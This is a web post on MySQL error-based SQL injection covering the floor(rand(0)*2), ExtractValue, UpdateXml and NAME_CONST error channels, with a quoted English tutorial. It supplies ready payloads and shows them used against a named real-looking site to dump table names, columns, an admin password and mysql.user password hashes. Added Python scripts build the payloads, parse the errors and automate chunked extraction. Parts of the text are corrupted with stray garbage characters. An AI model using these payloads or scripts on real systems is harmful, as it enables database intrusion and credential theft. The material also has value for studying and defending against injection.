MySQL error-based injection: exploiting the three error modes floor, ExtractValue and UpdateXml

Posted 2015-11-11 19:03:37

1. Triggering the error through floor()

Either of the following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Why this errors: when MySQL groups by a key that contains rand(), the key expression is evaluated once to look the group up in the temporary table and a second time when a new group is inserted. rand(0) is seeded, so floor(rand(0)*2) always yields the sequence 0,1,1,0,1,1,...; on the third source row the second evaluation produces a key that already exists and the server aborts with a duplicate-key error that carries the concatenated data. The source table therefore needs at least three rows, which is why the first form reads from information_schema.tables and the second form builds exactly three rows with a union.

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. Note that the last character of the reported entry ('1' here) is the output of floor(rand(0)*2) that was concatenated onto the data, not part of the data itself: the version is 5.1.33-community-log. To read other data, replace version() with the desired subquery.
For example, to read the administrator's user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

In both cases the password is admin888; the trailing 1 is the floor() digit (the ExtractValue result in section 2 confirms this).
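As an added illustration (not code from the original post), the following Python models the GROUP BY temporary-table behaviour described above with the fixed floor(rand(0)*2) sequence, so you can see why three source rows are needed and where the trailing digit in 'admin8881' comes from; it also strips that digit when parsing the error. The row data is constructed, and the 10-value sequence is MySQL's known rand(0) output.

```python
import re

# Constructed: the first ten values of floor(rand(0)*2) in MySQL. They are
# deterministic because the seed is fixed (0.155..., 0.620..., 0.638..., ...).
FLOOR_RAND0_SEQUENCE = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1]


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (23000): Duplicate entry ... for key 'group_key'."""


def simulate_group_by(num_rows, leaked_value, rand_bits=FLOOR_RAND0_SEQUENCE):
    """Model of how MySQL evaluates a GROUP BY key that contains rand().

    For each source row the key expression is evaluated once to look the
    group up in the temporary table. If the group does not exist yet, the
    expression is evaluated a second time to build the row that is inserted.
    With rand() in the key the two evaluations can differ, so the inserted
    key may collide with a group created earlier; that collision is the
    duplicate-key error which carries `leaked_value` out to the attacker.
    Returns the temporary table as {key: count} when no collision happens.
    """
    rand_iter = iter(rand_bits)
    temp_table = {}
    for _ in range(num_rows):
        key = leaked_value + str(next(rand_iter))   # evaluation 1: lookup
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = leaked_value + str(next(rand_iter))   # evaluation 2: insert
        if key in temp_table:
            raise DuplicateEntry("Duplicate entry '%s' for key 'group_key'" % key)
        temp_table[key] = 1
    return temp_table


def leaked_value_from_error(message):
    """Recover the injected data from the error text.

    The last character of the reported entry is the floor(rand(0)*2) digit
    that was concatenated onto the data, so it is dropped.
    """
    m = re.search(r"Duplicate entry '(.*)' for key 'group_key'", message)
    if not m:
        return None
    return m.group(1)[:-1]


if __name__ == "__main__":
    # Two rows never collide; three rows reproduce the post's 'admin8881' error.
    print(simulate_group_by(2, "admin888"))
    try:
        simulate_group_by(3, "admin888")
    except DuplicateEntry as err:
        print(err, "->", leaked_value_from_error(str(err)))
```

Without a seed, rand() is nondeterministic and the collision is not guaranteed on a given request, which is why the payloads above use rand(0) rather than rand().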

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

extractvalue() parses its second argument as an XPath expression; the leading 0x5c ('\') makes it syntactically invalid, so the server echoes the string back in the error. Only the first 32 characters of the expression are shown, so longer values have to be read in pieces with substr().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test (the same 32-character limit on the echoed expression applies):

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
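Both ExtractValue and UpdateXml report at most 32 characters of the offending XPath expression, so a value such as a 41-character mysql.user password hash is cut off. The following Python, an added example that is not from the original post, builds the payloads in the form used in sections 2 and 3 with substr() windows, parses the XPATH syntax error, and reassembles the full value. The `oracle` callable stands in for the HTTP request to the injectable parameter; `fake_oracle_for` is a constructed server emulation (the hash it serves is the one shown later on this page).

```python
import re

XPATH_ERROR_LIMIT = 32   # MySQL echoes at most 32 characters of the bad XPath expression
MARKER = "~"             # 0x7e; any character that cannot start an XPath expression works
                         # (the post uses 0x5c and 0x3a for the same purpose)


def xpath_payload(subquery, offset=1, length=XPATH_ERROR_LIMIT - 1, func="extractvalue"):
    """Build one error-triggering expression around `subquery`.

    substr() windows the result so that each error fits into the 32
    characters MySQL echoes; one character is spent on the marker.
    """
    assert func in ("extractvalue", "updatexml")
    expr = "concat(0x%02x,substr((%s),%d,%d))" % (ord(MARKER), subquery, offset, length)
    if func == "extractvalue":
        return "and extractvalue(1,%s)" % expr
    return "and updatexml(1,%s,1)" % expr


def value_from_xpath_error(message):
    """Pull the leaked chunk out of \"XPATH syntax error: '~chunk'\"."""
    m = re.search(r"XPATH syntax error: '(.*)'", message)
    if not m or not m.group(1).startswith(MARKER):
        return None
    return m.group(1)[len(MARKER):]


def extract_full_value(subquery, oracle, func="extractvalue"):
    """Drive the chunked extraction until a window comes back short or empty.

    `oracle(payload)` returns the server's error text, or an empty string
    when no error is produced (for example when the subquery yields NULL).
    """
    chunk_len = XPATH_ERROR_LIMIT - len(MARKER)
    result, offset = "", 1
    while True:
        chunk = value_from_xpath_error(oracle(xpath_payload(subquery, offset, chunk_len, func)))
        if not chunk:
            return result
        result += chunk
        if len(chunk) < chunk_len:
            return result
        offset += chunk_len


def fake_oracle_for(secret):
    """Constructed stand-in for a vulnerable endpoint: answers as MySQL would
    for a single secret value, including the 32-character truncation."""
    def oracle(payload):
        m = re.search(r"substr\(\(.*\),(\d+),(\d+)\)", payload)
        off, ln = int(m.group(1)), int(m.group(2))
        echoed = (MARKER + secret[off - 1:off - 1 + ln])[:XPATH_ERROR_LIMIT]
        return "ERROR 1105 (HY000): XPATH syntax error: '%s'" % echoed
    return oracle


if __name__ == "__main__":
    secret = "*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"   # 41 characters: needs two windows
    print(xpath_payload("select password from mysql.user limit 1"))
    print(extract_full_value("select password from mysql.user limit 1", fake_oracle_for(secret)))
```

A chunk shorter than the window means the value has been read completely; an empty chunk (only the marker echoed) means the previous window ended exactly at the end of the value.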



Further collected payloads (NAME_CONST):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Here the derived tables a and b each expose a column named after the value, and joining them produces a 'Duplicate column name' error that echoes it. The first form uses @@version, which is a constant; this matters on servers that reject non-constant NAME_CONST arguments.
Error-based injection tricks for newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

  [/ C7 `) P9 z* K( w( B4 {+ F) `  e  y
) s- w0 Z2 n5 p7 i1 H, w$ M
- y+ Y+ [; M/ R3 B1 r. q: `4 b0 X

: b; _! A  G0 m) t1 n# ], \/ tNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...7 L7 j% J, l/ ^5 ~
7 l# M5 H# n" {+ ]9 V7 b
Data Extraction/ S7 u7 K/ P; w" [
; x" r6 d( G2 U8 b7 t
Code:( h$ x7 ~! m8 o; y
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
8 c4 D, c6 \4 p# F. z( K5 z

5 g3 D% K! b' v6 w- Y" _+ @! R4 j3 J3 g4 c
We should get a duplicate column 1 error...
8 Y& c8 ]7 J, y( m! @
% i2 l0 K4 ~# B$ n5 LCode:
5 ^, ]! f# U* d1 ~' chttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' t# U* z( v0 L( Z3 c5 _: L2 k4 \! a0 a* I6 w  h$ p
Erroruplicate column name '1
3 J" ?- _8 l+ n) ~; }5 m

# M5 r& `* p/ f" ~$ {" W# j7 L9 g3 \( |$ O
9 I7 D. x, }8 {: s  t9 h% u

5 z4 ^3 v9 M. a% Z
" e- A# i8 N  k& D

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
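As an added example that belongs neither to the original post nor to the quoted NAME_CONST tutorial, the Python below builds the NAME_CONST payloads used in the "further collected payloads" section and in the tutorial (table, column and row enumeration with limit N,1 and hex-encoded identifiers such as 0x75736572 for 'user'), parses the Duplicate column name error, and flags the 'Incorrect arguments to NAME_CONST' rejection that later 5.x servers return when the name argument is not a constant, which is the most likely reading of the "invalid calls" the tutorial's author ran into. The oracle is a constructed stand-in for the HTTP request; the behaviour it models for an exhausted subquery (no error, so no name) is an assumption, and the enumeration loop also stops on a repeated name for that reason.

```python
import re


def mysql_hex(text):
    """Hex-literal form of a string (0x75736572 == 'user'), so the payload
    carries no quote characters for a filter or magic_quotes to mangle."""
    return "0x" + text.encode("utf-8").hex()


def name_const_payload(expr):
    """Two NAME_CONST() columns with the same name in one derived table.

    MySQL refuses to build the derived table and echoes the column name,
    i.e. the data, in 'Duplicate column name'. The tail is '-- -' because
    MySQL's '--' comment must be followed by whitespace.
    """
    return ("and 1=(select * from (select name_const((%s),1),"
            "name_const((%s),1)) as x)-- -" % (expr, expr))


def table_name_expr(offset):
    return ("select table_name from information_schema.tables "
            "where table_schema=database() limit %d,1" % offset)


def column_name_expr(schema, table, offset):
    return ("select column_name from information_schema.columns "
            "where table_schema=%s and table_name=%s limit %d,1"
            % (mysql_hex(schema), mysql_hex(table), offset))


def row_expr(table, columns, offset):
    """concat_ws(0x207e20, ...) joins the columns with ' ~ ' as in the tutorial."""
    return ("select concat_ws(0x207e20,%s) from %s limit %d,1"
            % (",".join(columns), table, offset))


class NonConstantRejected(Exception):
    """The server enforces constant NAME_CONST arguments, so subqueries
    cannot be smuggled through it; only @@variables can be read this way
    and another error channel (floor, extractvalue) is needed for data."""


def value_from_name_const_error(message):
    if "Incorrect arguments to NAME_CONST" in message:
        raise NonConstantRejected(message)
    m = re.search(r"Duplicate column name '([^']*)'", message)
    return m.group(1) if m else None


def enumerate_names(expr_for_offset, oracle, max_rows=200):
    """Walk limit N,1 until the error channel stops yielding a new name."""
    names = []
    for offset in range(max_rows):
        leaked = value_from_name_const_error(oracle(name_const_payload(expr_for_offset(offset))))
        if leaked is None or leaked in names:
            break
        names.append(leaked)
    return names


def fake_oracle(rows):
    """Constructed stand-in for the vulnerable page: answers for a fixed list
    of rows the way the tutorial's 5.0.27 server did. Assumption: once the
    subquery is exhausted no duplicate-column error is produced."""
    def oracle(payload):
        offset = int(re.search(r"limit (\d+),1", payload).group(1))
        if offset >= len(rows):
            return ""
        return "Error: Duplicate column name '%s'" % rows[offset]
    return oracle


if __name__ == "__main__":
    print(name_const_payload(table_name_expr(0)))
    print(enumerate_names(table_name_expr, fake_oracle(["com_admanage", "com_users"])))
    print(enumerate_names(lambda n: column_name_expr("mysql", "user", n),
                          fake_oracle(["Host", "User", "Password"])))
    print(enumerate_names(lambda n: row_expr("mysql.user", ["User", "Password"], n),
                          fake_oracle(["root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"])))
```

On a server that answers with 'Incorrect arguments to NAME_CONST', fall back to the floor() or ExtractValue/UpdateXml channels from the first part of this page; the @@version probe still works there because a system variable is a constant.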